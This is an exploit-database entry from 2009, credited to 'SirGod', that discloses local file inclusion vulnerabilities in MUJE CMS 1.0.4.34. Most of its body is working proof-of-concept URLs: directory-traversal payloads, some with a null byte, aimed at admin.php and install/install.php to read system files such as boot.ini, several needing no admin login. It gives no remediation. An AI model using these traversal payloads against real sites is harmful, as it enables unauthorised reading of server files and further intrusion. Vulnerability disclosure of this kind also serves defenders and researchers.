MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities

2009-07-30T00:00:00
ID 1337DAY-ID-5583
Type zdt
Reporter SirGod
Modified 2009-07-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
======================================================


####################################################################################
[+] MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
####################################################################################

[+] Download : http://sourceforge.net/projects/mujecms/

[+] Local File Inclusion

 - No admin required

 - PoC's

    http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00

    http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini


 - Admin required

    http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00

####################################################################################




#  0day.today [2018-01-06]  #